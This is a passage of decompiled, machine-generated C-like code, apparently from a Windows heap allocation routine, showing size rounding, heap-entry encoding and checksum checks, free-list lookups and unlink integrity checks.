				_v12 = _v12 ^ _t980;
				_push(_t980 ^ _t1837);
				 *[fs:0x0] =  &_v20;
				_t1440 = __edx;
				_v120 = __edx;
				_t1771 = __ecx;
				_v124 = __ecx;
				_v140 = 0;
				_v116 = 1;
				_v49 = 0;
				_v88 = 0;
				_v68 = 0;
				_v152 = 0;
				_t1784 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v116 = 0;
					 *_a16 = 4;
					_t985 = _a4;
					__eflags = _t985 - 0x7fffffff;
					if(_t985 <= 0x7fffffff) {
						__eflags = _t1440 & 0x61000000;
						if((_t1440 & 0x61000000) == 0) {
							L10:
							__eflags = _t985;
							if(_t985 == 0) {
								_t985 = 1;
							}
							_t1661 =  *((intOrPtr*)(_t1771 + 0x94)) + _t985 &  *(_t1771 + 0x98);
							__eflags = _t1661 - 0x10;
							if(_t1661 < 0x10) {
								_t1661 = 0x10;
							}
							_a8 = _t1661;
							_t1464 = _t1440 >> 0x00000004 & 0xffffffe1 | 0x00000001;
							_v56 = _t1464;
							__eflags = _t1440 & 0x3c000100;
							if((_t1440 & 0x3c000100) != 0) {
								L16:
								_t1464 = _t1464 | 0x00000002;
								_v56 = _t1464;
								_t1661 = _t1661 + 8;
								__eflags = _t1661;
								_a8 = _t1661;
							} else {
								__eflags =  *(_t1771 + 0xbc);
								if( *(_t1771 + 0xbc) != 0) {
									goto L16;
								}
							}
							_t1662 = _t1661 >> 3;
							__eflags = _t1662;
							_v40 = _t1662;
							goto L18;
						} else {
							__eflags = _t1440 & 0x10000000;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t1436 = E1E6FF0A5(_t1440, _t1460, _t1658, _t1771, _t1784, __eflags, _t985);
								 *[fs:0x0] = _v20;
								return _t1436;
							}
						}
					} else {
						__eflags = 0;
						 *[fs:0x0] = _v20;
						return 0;
					}
				} else {
					_t1464 = 1;
					_v56 = 1;
					_t1662 = _t1784;
					_v40 = _t1662;
					if(_t1662 < 2) {
						_a8 = _a8 + 8;
						_t1662 = 2;
						_v40 = 2;
					}
					 *_a16 = 3;
					L18:
					_t1441 = _t1440 & 0x00800000;
					if(_t1441 != 0 && ( *( *[fs:0x30] + 0x68) & 0x00000800) == 0) {
						_t1464 = _t1464 | 0x00000008;
						_v56 = _t1464;
					}
					_v8 = 0;
					_t1851 = _v120 & 0x00000001;
					if((_v120 & 0x00000001) != 0) {
						L30:
						__eflags = _t1662 -  *((intOrPtr*)(_t1771 + 0x5c));
						if(_t1662 >  *((intOrPtr*)(_t1771 + 0x5c))) {
							__eflags =  *(_t1771 + 0x40) & 0x00000002;
							if(( *(_t1771 + 0x40) & 0x00000002) == 0) {
								_v180 = 0xc0000023;
								goto L516;
							} else {
								_t1789 = _a8 + 0x18;
								_a8 = _t1789;
								_a8 = _t1789;
								_t898 = _t1789 + 0xfff; // 0xfe7
								_t1469 = _t898 & 0xfffff000;
								_t994 = E1E6868EA( *((intOrPtr*)(_t1771 + 0x1f8)) -  *((intOrPtr*)(_t1771 + 0x244)), _t1771, _t1771 + 0xd4);
								__eflags = _t994;
								if(_t994 != 0) {
									_v328 = (E1E652330(_t1469) & 0x0000000f) << 0xc;
									_t1666 =  &_a8;
									_t998 = E1E6A7948(_t1771,  &_a8, (E1E652330(_t1469) & 0x0000000f) << 0xc,  &_v256);
									_t1790 = _t998;
									_v68 = _t1790;
									__eflags = _t1790;
									if(_t1790 != 0) {
										_t1791 = _v68;
										_t1472 = _a8;
										 *(_t1791 + 0x18) = _t1472 - _a4;
										 *(_t1791 + 0x1a) = _v56 | 0x00000002;
										 *(_t1791 + 0x10) = _t1472;
										 *((intOrPtr*)(_t1791 + 0x14)) = _v256;
										 *((char*)(_t1791 + 0x1f)) = 4;
										 *((intOrPtr*)(_t1771 + 0x200)) =  *((intOrPtr*)(_t1771 + 0x200)) + _t1472;
										_t1004 = E1E663C40();
										__eflags = _t1004;
										if(_t1004 == 0) {
											_t1005 = 0x7ffe0380;
										} else {
											_t1005 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1005;
										if( *_t1005 != 0) {
											_t1047 =  *[fs:0x30];
											__eflags =  *(_t1047 + 0x240) & 0x00000001;
											if(( *(_t1047 + 0x240) & 0x00000001) != 0) {
												_t1666 = _v68;
												E1E70EFD3(_t1441, _t1771, _v68, _a8, 9);
											}
										}
										_t1006 = E1E663C40();
										__eflags = _t1006;
										if(_t1006 == 0) {
											_t1007 = 0x7ffe0380;
										} else {
											_t1007 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1007;
										if( *_t1007 != 0) {
											_t1036 =  *[fs:0x30];
											__eflags =  *(_t1036 + 0x240) & 0x00000001;
											if(( *(_t1036 + 0x240) & 0x00000001) != 0) {
												_t1037 = E1E663C40();
												__eflags = _t1037;
												if(_t1037 == 0) {
													_t1038 = 0x7ffe0380;
												} else {
													_t1038 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
												}
												__eflags =  *(_t1771 + 0x74) << 3;
												_t1666 = _v68;
												E1E70F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1038 & 0x000000ff);
											}
										}
										_t1008 = E1E663C40();
										__eflags = _t1008;
										if(_t1008 == 0) {
											_t1009 = 0x7ffe038a;
										} else {
											_t1009 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										}
										__eflags =  *_t1009;
										if( *_t1009 != 0) {
											_t1026 = E1E663C40();
											__eflags = _t1026;
											if(_t1026 == 0) {
												_t1027 = 0x7ffe038a;
											} else {
												_t1027 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
											}
											__eflags =  *(_t1771 + 0x74) << 3;
											_t1666 = _v68;
											E1E70F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1027 & 0x000000ff);
										}
										__eflags =  *(_t1771 + 0x40) & 0x08000000;
										if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
											 *((short*)(_v68 + 8)) = E1E67FDB9(1, _t1666);
										}
										_t1011 =  *( *[fs:0x30] + 0x68);
										_v332 = _t1011;
										__eflags = _t1011 & 0x00000800;
										if((_t1011 & 0x00000800) != 0) {
											__eflags = _v120 >> 0x12;
											 *((short*)(_v68 + 0xa)) = E1E6F9AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *(_t1791 + 0x10) >> 3, 1);
										}
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *(_t1791 + 0x1b) =  *(_t1791 + 0x1a) ^  *(_t1791 + 0x19) ^  *(_t1791 + 0x18);
											_t960 = _t1791 + 0x18;
											 *_t960 =  *(_t1791 + 0x18) ^  *(_t1771 + 0x50);
											__eflags =  *_t960;
										}
										_t1012 = _t1771 + 0x9c;
										_t1473 =  *((intOrPtr*)(_t1012 + 4));
										_t1667 =  *_t1473;
										__eflags = _t1667 - _t1012;
										if(_t1667 != _t1012) {
											__eflags = 0;
											E1E715FED(0xd, 0, _t1012, 0, _t1667, 0);
										} else {
											_t1792 = _v68;
											 *_t1792 = _t1012;
											 *((intOrPtr*)(_t1792 + 4)) = _t1473;
											 *_t1473 = _t1792;
											 *((intOrPtr*)(_t1012 + 4)) = _t1792;
										}
										_v88 = _v68 + 0x20;
									} else {
										_v88 = _t998;
										 *((intOrPtr*)(_t1771 + 0x224)) =  *((intOrPtr*)(_t1771 + 0x224)) + 1;
									}
								} else {
									_v180 = 0xc000012d;
									goto L516;
								}
							}
						} else {
							__eflags = _t1441;
							if(_t1441 == 0) {
								__eflags = _t1784 - ( *(_t1771 + 0xf0) & 0x0000ffff);
								_t1413 = _a4;
								if(_t1784 < ( *(_t1771 + 0xf0) & 0x0000ffff)) {
									__eflags = _t1413 -  *0x1e743928; // 0x4000
									if(__eflags <= 0) {
										_t1417 = (_t1784 >> 3) + 0xf2 + _t1771;
										_v72 = _t1417;
										_t1767 =  *_t1417;
										_t1464 = _t1784 & 0x00000007;
										_t1419 = 1 << _t1464;
										__eflags = _t1767 & _t1419;
										if((_t1767 & _t1419) == 0) {
											_t1833 =  *((intOrPtr*)(_t1771 + 0xec)) + _t1784 * 2;
											_v264 = _t1833;
											 *_t1833 =  *_t1833 + 0x21;
											_t1464 =  *_t1833;
											__eflags = _v152;
											if(_v152 != 0) {
												L45:
												_t1421 = _a4;
												__eflags = _t1421;
												_t1768 = _t1421;
												if(_t1421 == 0) {
													_t1768 = 1;
												}
												__eflags =  *((char*)(_t1771 + 0xea)) - 2;
												if( *((char*)(_t1771 + 0xea)) != 2) {
													_t1653 = 0;
													__eflags = 0;
												} else {
													_t1653 =  *(_t1771 + 0xe4);
												}
												_t1423 = E1E64E2AA(_t1653, _t1768) & 0x0000ffff;
												_t1464 = 0xffff;
												__eflags = _t1423 - 0xffff;
												if(_t1423 == 0xffff) {
													__eflags =  *((char*)(_t1771 + 0xea)) - 2;
													if( *((char*)(_t1771 + 0xea)) != 2) {
														L54:
														_t90 = _t1771 + 0x48;
														 *_t90 =  *(_t1771 + 0x48) | 0x20000000;
														__eflags =  *_t90;
													} else {
														__eflags =  *(_t1771 + 0xe4);
														if( *(_t1771 + 0xe4) == 0) {
															goto L54;
														}
													}
												} else {
													 *_t1833 = _t1423;
													_t1464 = _v72;
													asm("bts eax, ebx");
													 *_t1464 =  *_t1464 & 0x000000ff;
													 *((intOrPtr*)(_t1771 + 0x23c)) =  *((intOrPtr*)(_t1771 + 0x23c)) + 1;
												}
											} else {
												__eflags = (_t1464 & 0x0000001f) - 0x10;
												if((_t1464 & 0x0000001f) > 0x10) {
													L44:
													_v188 = 1;
													goto L45;
												} else {
													__eflags = _t1464 - 0xff00;
													if(_t1464 > 0xff00) {
														goto L44;
													} else {
														_v188 = 0;
													}
												}
											}
										}
										_t1662 = _v40;
									}
								} else {
									__eflags = _t1413 -  *0x1e743928; // 0x4000
									if(__eflags <= 0) {
										__eflags =  *((char*)(_t1771 + 0xea)) - 2;
										if( *((char*)(_t1771 + 0xea)) != 2) {
											L36:
											__eflags =  *((char*)(_t1771 + 0xeb)) - 2;
											if( *((char*)(_t1771 + 0xeb)) == 2) {
												 *(_t1771 + 0x48) =  *(_t1771 + 0x48) | 0x20000000;
											}
										} else {
											__eflags =  *(_t1771 + 0xe4) - _t1441;
											if( *(_t1771 + 0xe4) == _t1441) {
												goto L36;
											}
										}
									}
								}
							}
							_t1793 = _a12;
							__eflags = _t1793;
							if(_t1793 == 0) {
								L95:
								_v204 = _t1771 + 0xc0;
								_t1794 =  *(_t1771 + 0xb4);
								_v44 = _t1794;
								while(1) {
									_t1482 = _t1794[1];
									__eflags = _t1662 - _t1482;
									if(_t1662 < _t1482) {
										break;
									}
									_t1052 =  *_t1794;
									__eflags = _t1052;
									if(_t1052 != 0) {
										_t1794 = _t1052;
										_v44 = _t1052;
										continue;
									} else {
										_t1053 = _t1482 - 1;
										L100:
										_v176 = _t1053;
									}
									L101:
									_v72 = _t1053;
									_v80 = _t1053 - _t1794[5];
									_v36 = 0;
									_t1670 = _t1794[6];
									_v96 = _t1670;
									_t1055 =  *((intOrPtr*)(_t1670 + 4));
									__eflags = _t1670 - _t1055;
									if(_t1670 != _t1055) {
										_t1056 = _t1055 + 0xfffffff8;
										_v32 = _t1056;
										_t1443 =  *_t1056;
										_v348 = _t1443;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											_t1443 = _t1443 ^  *(_t1771 + 0x50);
											_v348 = _t1443;
											__eflags = _t1443 >> 0x18 - (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443);
											if(_t1443 >> 0x18 != (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443)) {
												E1E715FED(3, _t1771, _v32, 0, 0, 0);
												_t1670 = _v96;
											}
										}
										_t1484 = _v40 - (_t1443 & 0x0000ffff);
										_v276 = _t1484;
										__eflags = _t1484;
										if(_t1484 <= 0) {
											_t1059 =  *_t1670 + 0xfffffff8;
											_v32 = _t1059;
											_t1444 =  *_t1059;
											_v356 = _t1444;
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												_t1444 = _t1444 ^  *(_t1771 + 0x50);
												_v356 = _t1444;
												__eflags = _t1444 >> 0x18 - (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444);
												if(_t1444 >> 0x18 != (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444)) {
													E1E715FED(3, _t1771, _v32, 0, 0, 0);
													_t1670 = _v96;
												}
											}
											_t1486 = _v40 - (_t1444 & 0x0000ffff);
											_v280 = _t1486;
											__eflags = _t1486;
											if(_t1486 > 0) {
												__eflags =  *_t1794;
												if( *_t1794 != 0) {
													L127:
													_t1487 = _v80;
													_t1672 = _t1487 >> 5;
													_v32 = (_t1794[1] - _t1794[5] >> 5) - 1;
													_t1066 = _t1794[7] + _t1672 * 4;
													_t1447 = (_t1444 | 0xffffffff) << (_t1487 & 0x0000001f) &  *_t1066;
													__eflags = _t1447;
													_t1486 = _v32;
													while(1) {
														_v200 = _t1066;
														_v156 = _t1672;
														__eflags = _t1447;
														if(_t1447 != 0) {
															break;
														}
														__eflags = _t1672 - _t1486;
														if(_t1672 > _t1486) {
															__eflags = _t1447;
															if(_t1447 == 0) {
																L475:
																_t1794 =  *_t1794;
																_v44 = _t1794;
																_t1053 = _t1794[5];
																goto L100;
															} else {
																break;
															}
														} else {
															_t1066 =  &(_t1066[1]);
															_t1447 =  *_t1066;
															_t1672 = _t1672 + 1;
															continue;
														}
														goto L143;
													}
													__eflags = _t1447;
													if(_t1447 == 0) {
														_t1069 = _t1447 >> 0x00000010 & 0x000000ff;
														__eflags = _t1069;
														if(_t1069 == 0) {
															_t1071 = ( *((_t1447 >> 0x18) + 0x1e6289b0) & 0x000000ff) + 0x18;
															__eflags = _t1071;
														} else {
															_t1071 = ( *(_t1069 + 0x1e6289b0) & 0x000000ff) + 0x10;
														}
													} else {
														_t1356 = _t1447 & 0x000000ff;
														__eflags = _t1447;
														if(_t1447 == 0) {
															_t1071 = ( *((_t1447 >> 0x00000008 & 0x000000ff) + 0x1e6289b0) & 0x000000ff) + 8;
														} else {
															_t1071 =  *(_t1356 + 0x1e6289b0) & 0x000000ff;
														}
													}
													_t1674 = (_t1672 << 5) + _t1071;
													_v156 = _t1674;
													__eflags = _t1794[2];
													if(_t1794[2] != 0) {
														_t1674 = _t1674 + _t1674;
														__eflags = _t1674;
													}
													_t1073 =  *(_t1794[8] + _t1674 * 4);
													goto L142;
												} else {
													__eflags = _v72 - _t1794[1] - 1;
													if(_v72 != _t1794[1] - 1) {
														goto L127;
													} else {
														_t1486 = _v80;
														__eflags = _t1794[2];
														if(_t1794[2] != 0) {
															_t1486 = _t1486 + _t1486;
															__eflags = _t1486;
														}
														_t1825 =  *(_t1794[8] + _t1486 * 4);
														while(1) {
															__eflags = _t1670 - _t1825;
															if(_t1670 == _t1825) {
																break;
															}
															_t1752 = _t1825 - 8;
															_t1454 =  *(_t1825 - 8);
															_v364 = _t1454;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1454 = _t1454 ^  *(_t1771 + 0x50);
																_v364 = _t1454;
																__eflags = _t1454 >> 0x18 - (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454);
																if(_t1454 >> 0x18 != (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454)) {
																	E1E715FED(3, _t1771, _t1752, 0, 0, 0);
																}
															}
															_t1486 = _v40 - (_t1454 & 0x0000ffff);
															_v284 = _t1486;
															__eflags = _t1486;
															if(_t1486 > 0) {
																_t1825 =  *_t1825;
																_t1670 = _v96;
																continue;
															} else {
																_t1073 = _t1825;
																_t1794 = _v44;
																goto L142;
															}
															goto L143;
														}
														_t1073 = _v36;
														_t1794 = _v44;
													}
												}
											} else {
												_t1073 =  *_t1670;
												goto L142;
											}
										} else {
											_t1073 = _t1670;
											goto L142;
										}
									} else {
										_t1073 = _t1670;
										L142:
										_v36 = _t1073;
									}
									L143:
									__eflags = _t1073;
									if(_t1073 == 0) {
										goto L475;
									}
									_v288 = _t1073;
									__eflags = _v204 - _t1073;
									if(_v204 == _t1073) {
										L186:
										_t1441 = E1E660445(_t1771, _a8);
										_v92 = _t1441;
										__eflags = _t1441;
										if(_t1441 == 0) {
											_v180 = 0xc0000017;
											L516:
											_v88 = 0;
										} else {
											_t350 = _t1441 + 8; // 0x8
											_t1795 = _t350;
											_t1495 =  *_t1795;
											_v32 = _t1495;
											_t1075 =  *(_t1441 + 0xc);
											_v48 = _t1075;
											_t1076 =  *_t1075;
											_t1496 =  *((intOrPtr*)(_t1495 + 4));
											__eflags = _t1076 - _t1496;
											if(_t1076 != _t1496) {
												L473:
												E1E715FED(0xd, _t1771, _t1795, _t1496, _t1076, 0);
												_v61 = 0;
											} else {
												__eflags = _t1076 - _t1795;
												if(_t1076 != _t1795) {
													goto L473;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
													_t1677 =  *(_t1771 + 0xb4);
													__eflags = _t1677;
													if(_t1677 != 0) {
														_t1605 =  *_t1441 & 0x0000ffff;
														while(1) {
															__eflags = _t1605 -  *((intOrPtr*)(_t1677 + 4));
															if(_t1605 <  *((intOrPtr*)(_t1677 + 4))) {
																break;
															}
															_t1321 =  *_t1677;
															__eflags = _t1321;
															if(_t1321 != 0) {
																_t1677 = _t1321;
																continue;
															} else {
																_t1605 =  *((intOrPtr*)(_t1677 + 4)) - 1;
																__eflags = _t1605;
															}
															break;
														}
														_v216 = _t1605;
														E1E66036A(_t1771, _t1677, 1, _t1795, _t1605,  *_t1441 & 0x0000ffff);
													}
													_t1079 = _v32;
													_t1498 = _v48;
													 *_t1498 = _t1079;
													 *(_t1079 + 4) = _t1498;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L199:
														_v61 = 1;
														goto L200;
													} else {
														_t1316 = E1E64F5C7(_t1771, _t1441);
														__eflags = _t1316;
														if(_t1316 != 0) {
															goto L199;
														} else {
															E1E64F113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v61 = 0;
														}
													}
												}
											}
										}
									} else {
										_t1441 = _t1073 - 8;
										_v92 = _t1441;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
											__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
											if(__eflags != 0) {
												_push(_t1486);
												E1E70D646(_t1441, _t1771, _t1441, _t1771, _t1794, __eflags);
											}
											_t1073 = _v36;
										}
										_t1819 =  *_t1441 & 0x0000ffff;
										__eflags = _t1819 - _v40;
										if(_t1819 < _v40) {
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
												 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
												__eflags =  *_t1441;
											}
											goto L186;
										} else {
											_t1738 =  *(_t1441 + 8);
											_v128 = _t1738;
											_t1608 =  *(_t1441 + 0xc);
											_v144 = _t1608;
											_t1609 =  *_t1608;
											_t1739 =  *((intOrPtr*)(_t1738 + 4));
											__eflags = _t1609 - _t1739;
											if(_t1609 != _t1739) {
												L183:
												E1E715FED(0xd, _t1771, _t1073, _t1739, _t1609, 0);
												_v58 = 0;
											} else {
												__eflags = _t1609 - _t1073;
												if(_t1609 != _t1073) {
													goto L183;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - _t1819;
													_t1611 =  *(_t1771 + 0xb4);
													_v44 = _t1611;
													__eflags = _t1611;
													if(_t1611 != 0) {
														_t1820 =  *_t1441 & 0x0000ffff;
														_v72 = _t1820;
														while(1) {
															_t1743 =  *(_t1611 + 4);
															__eflags = _t1820 - _t1743;
															if(_t1820 < _t1743) {
																break;
															}
															_t1349 =  *_t1611;
															__eflags = _t1349;
															if(_t1349 != 0) {
																_t1611 = _t1349;
																_v44 = _t1611;
																continue;
															} else {
																_t1820 = _t1743 - 1;
																_v72 = _t1820;
															}
															break;
														}
														_v208 = _t1820;
														_v108 =  *_t1441 & 0x0000ffff;
														_t1745 = _t1820 -  *((intOrPtr*)(_t1611 + 0x14));
														_v36 = _t1745;
														__eflags =  *(_t1611 + 8);
														_t1332 = _t1745 + _t1745;
														if( *(_t1611 + 8) == 0) {
															_t1332 = _t1745;
														}
														_t1774 = _t1332 * 4;
														_v80 = _t1774;
														_t1334 =  *((intOrPtr*)(_t1611 + 0x20)) + _t1774;
														_v96 = _t1334;
														_v32 =  *_t1334;
														 *((intOrPtr*)(_t1611 + 0xc)) =  *((intOrPtr*)(_t1611 + 0xc)) - 1;
														_t1336 =  *(_t1611 + 4);
														_t1775 = _t1336 - 1;
														_v48 = _t1775;
														__eflags = _t1820 - _t1775;
														_t1771 = _v124;
														if(_t1820 == _t1775) {
															_t293 = _t1611 + 0x10;
															 *_t293 =  *(_t1611 + 0x10) - 1;
															__eflags =  *_t293;
														}
														_t295 = _t1441 + 8; // 0xddeeddf6
														_t1821 = _t295;
														__eflags = _v32 - _t1821;
														if(_v32 == _t1821) {
															_v212 = _t1336;
															__eflags =  *_t1611;
															if( *_t1611 == 0) {
																_t1336 = _v48;
																_v212 = _t1336;
															}
															_t1822 =  *_t1821;
															_v32 =  *(_t1611 + 0x18);
															__eflags = _v72 - _t1336;
															_t1771 = _v124;
															if(_v72 >= _t1336) {
																_t1337 = _v96;
																__eflags = _t1822 - _v32;
																if(_t1822 == _v32) {
																	 *_t1337 = 0;
																	goto L177;
																} else {
																	 *_t1337 = _t1822;
																	goto L172;
																}
																goto L525;
															} else {
																__eflags = _t1822 -  *(_t1611 + 0x18);
																if(_t1822 ==  *(_t1611 + 0x18)) {
																	L176:
																	 *(_v80 +  *((intOrPtr*)(_t1611 + 0x20))) = 0;
																	L177:
																	_v36 = _t1745 & 0x0000001f;
																	_t333 = _v44 + 0x1c; // 0x0
																	 *( *_t333 + (_t1745 >> 5) * 4) =  *( *_t333 + (_t1745 >> 5) * 4) &  !(1 << _v36);
																} else {
																	_t1450 =  *(_t1822 - 8);
																	_v372 = _t1450;
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) != 0) {
																		_t1450 = _t1450 ^  *(_t1771 + 0x50);
																		_v372 = _t1450;
																		__eflags = _t1450 >> 0x18 - (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450);
																		if(_t1450 >> 0x18 != (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450)) {
																			E1E715FED(3, _t1771, _t1822 - 8, 0, 0, 0);
																			_t1745 = _v36;
																		}
																		_t1611 = _v44;
																	}
																	_t1452 = _v108 - (_t1450 & 0x0000ffff);
																	__eflags = _t1452;
																	_v292 = _t1452;
																	if(_t1452 != 0) {
																		_t1441 = _v92;
																		goto L176;
																	} else {
																		_t315 = _t1611 + 0x20; // 0xffffffe4
																		 *(_v80 +  *_t315) = _t1822;
																		_t1441 = _v92;
																	}
																}
															}
														}
													}
													L172:
													_t1327 = _v128;
													_t1612 = _v144;
													 *_t1612 = _t1327;
													 *(_t1327 + 4) = _t1612;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L182:
														_v58 = 1;
														goto L200;
													} else {
														_t1328 = E1E64F5C7(_t1771, _t1441);
														__eflags = _t1328;
														if(_t1328 != 0) {
															goto L182;
														} else {
															E1E64F113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v58 = 0;
														}
													}
												}
											}
										}
									}
									goto L517;
								}
								_v176 = _t1662;
								_t1053 = _t1662;
								goto L101;
							} else {
								_t1826 =  *_t1793;
								__eflags = _t1826;
								if(_t1826 == 0) {
									goto L95;
								} else {
									_t1441 = _t1826 - 8;
									_v92 = _t1441;
									__eflags =  *(_t1771 + 0x4c);
									if( *(_t1771 + 0x4c) != 0) {
										 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
										__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
										if(__eflags != 0) {
											_push(_t1464);
											E1E70D646(_t1441, _t1771, _t1441, _t1771, _t1826, __eflags);
										}
									}
									_t1635 =  *(_t1441 + 8);
									_v48 = _t1635;
									_t1378 =  *(_t1441 + 0xc);
									_v32 = _t1378;
									_t1379 =  *_t1378;
									_t1636 =  *((intOrPtr*)(_t1635 + 4));
									__eflags = _t1379 - _t1636;
									if(_t1379 != _t1636) {
										L93:
										E1E715FED(0xd, _t1771, _t1826, _t1636, _t1379, 0);
										goto L94;
									} else {
										__eflags = _t1379 - _t1826;
										if(_t1379 != _t1826) {
											goto L93;
										} else {
											 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
											_t1757 =  *(_t1771 + 0xb4);
											_v44 = _t1757;
											__eflags = _t1757;
											if(_t1757 != 0) {
												_t1828 =  *_t1441 & 0x0000ffff;
												_v72 = _t1828;
												while(1) {
													_t1641 =  *(_t1757 + 4);
													__eflags = _t1828 - _t1641;
													if(_t1828 < _t1641) {
														break;
													}
													_t1406 =  *_t1757;
													__eflags = _t1406;
													if(_t1406 != 0) {
														_t1757 = _t1406;
														_v44 = _t1757;
														continue;
													} else {
														_t1828 = _t1641 - 1;
														_v72 = _t1828;
													}
													break;
												}
												_v192 = _t1828;
												_v128 =  *_t1441 & 0x0000ffff;
												_t1643 = _t1828 -  *((intOrPtr*)(_t1757 + 0x14));
												_v108 = _t1643;
												__eflags =  *(_t1757 + 8);
												_t1389 = _t1643 + _t1643;
												if( *(_t1757 + 8) == 0) {
													_t1389 = _t1643;
												}
												_t1777 = _t1389 * 4;
												_v80 = _t1777;
												_t1391 =  *((intOrPtr*)(_t1757 + 0x20)) + _t1777;
												_v96 = _t1391;
												_v36 =  *_t1391;
												 *((intOrPtr*)(_t1757 + 0xc)) =  *((intOrPtr*)(_t1757 + 0xc)) - 1;
												_t1393 =  *(_t1757 + 4);
												_t1778 = _t1393 - 1;
												_v144 = _t1778;
												__eflags = _t1828 - _t1778;
												_t1771 = _v124;
												if(_t1828 == _t1778) {
													_t131 = _t1757 + 0x10;
													 *_t131 =  *(_t1757 + 0x10) - 1;
													__eflags =  *_t131;
												}
												_t133 = _t1441 + 8; // 0xddeeddf6
												_t1829 = _t133;
												__eflags = _v36 - _t1829;
												if(_v36 == _t1829) {
													_v196 = _t1393;
													__eflags =  *_t1757;
													if( *_t1757 == 0) {
														_t1393 = _v144;
														_v196 = _t1393;
													}
													_t1830 =  *_t1829;
													_v144 =  *(_t1757 + 0x18);
													__eflags = _v72 - _t1393;
													_t1771 = _v124;
													if(_v72 >= _t1393) {
														_t1394 = _v96;
														__eflags = _t1830 - _v144;
														if(_t1830 == _v144) {
															 *_t1394 = 0;
															goto L87;
														} else {
															 *_t1394 = _t1830;
															goto L82;
														}
														goto L525;
													} else {
														__eflags = _t1830 -  *(_t1757 + 0x18);
														if(_t1830 ==  *(_t1757 + 0x18)) {
															L86:
															 *(_v80 +  *((intOrPtr*)(_t1757 + 0x20))) = 0;
															L87:
															_t168 = _v44 + 0x1c; // 0x0
															 *( *_t168 + (_t1643 >> 5) * 4) =  *( *_t168 + (_t1643 >> 5) * 4) &  !(1 << (_t1643 & 0x0000001f));
														} else {
															_t1455 =  *(_t1830 - 8);
															_v340 = _t1455;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1455 = _t1455 ^  *(_t1771 + 0x50);
																_v340 = _t1455;
																__eflags = _t1455 >> 0x18 - (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455);
																if(_t1455 >> 0x18 != (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455)) {
																	E1E715FED(3, _t1771, _t1830 - 8, 0, 0, 0);
																	_t1757 = _v44;
																}
															}
															_t1646 = _v128 - (_t1455 & 0x0000ffff);
															__eflags = _t1646;
															_v268 = _t1646;
															if(_t1646 != 0) {
																_t1441 = _v92;
																_t1643 = _v108;
																goto L86;
															} else {
																_t152 = _t1757 + 0x20; // 0xffffffe4
																 *(_v80 +  *_t152) = _t1830;
																_t1441 = _v92;
															}
														}
													}
												}
											}
											L82:
											_t1384 = _v48;
											_t1638 = _v32;
											 *_t1638 = _t1384;
											 *(_t1384 + 4) = _t1638;
											__eflags =  *(_t1441 + 2) & 0x00000008;
											if(( *(_t1441 + 2) & 0x00000008) == 0) {
												L92:
												_v57 = 1;
												L200:
												_t1499 =  *(_t1441 + 2);
												_v59 = _t1499;
												_t1796 = _v116;
												__eflags = _t1796;
												if(_t1796 == 0) {
													__eflags = _t1499 & 0x00000004;
													if((_t1499 & 0x00000004) != 0) {
														_t1818 = ( *_t1441 & 0x0000ffff) * 8 - 0x10;
														_v220 = _t1818;
														__eflags = _t1499 & 0x00000002;
														if((_t1499 & 0x00000002) != 0) {
															__eflags = _t1818 - 4;
															if(_t1818 > 4) {
																_t1818 = _t1818 - 4;
																__eflags = _t1818;
																_v220 = _t1818;
															}
														}
														_t380 = _t1441 + 0x10; // 0x10
